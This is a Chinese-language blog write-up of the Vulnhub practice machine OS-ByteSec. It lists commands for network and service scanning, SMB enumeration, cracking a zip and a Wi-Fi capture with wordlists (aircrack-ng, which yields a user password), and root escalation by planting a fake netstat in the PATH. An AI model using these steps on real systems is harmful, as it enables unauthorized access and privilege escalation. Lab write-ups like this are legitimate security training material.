前言
- Vulnhub刷题简单记录
OS-BYTESEC
描述
难度:中级
标志:引导根
学习:利用 | 网络应用安全| 权限提升
OS-BYTESEC
1、可以用两种方法确认靶场的存在,扫ip
1 |
netdiscover -i eth0 -r 192.168.1.0/24 |
2、扫目标端口开发情况
1 |
nmap -sV -sC -A 192.168.136.150 -o os-ByteSec |
3、访问主页,根据提示说有一个password_resets,我们扫一下目录情况
1 |
gobuster dir -u http://192.168.136.150/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 2 |
4、通过smbmap查看共享文件,也可以用 enum4linux来全方面枚举信息
1 |
smbmap -H 192.168.136.150 |
1 |
S-1-22-1-1000 Unix User\sagar (Local User) |
5、根据主页的提示smb无密码,所以直接用smbclient登陆
6、接着获取其中的文件
7、破解zip密码hacker1
1 |
fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u safe.zip |
1 |
xdg-open secret.jpg |
7、破解包,发现了blackjax的密码为snowflake
1 |
aircrack-ng -w /usr/share/wordlist/rockyou.txt user.cap |
接着ssh登陆,一开始扫出的ssh端口为2525
7、看看能不能suid提权
1 |
find / type f -perm -u=s 2>/dev/null |
8、利用环境命令的劫持,来让我们提升到root权限
1 |
blackjax@nitin:/tmp$ echo "/bin/sh" > netstat |
我的个人博客
孤桜懶契:http://gylq.gitee.io
FROM:gylq.gitee Author:孤桜懶契
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论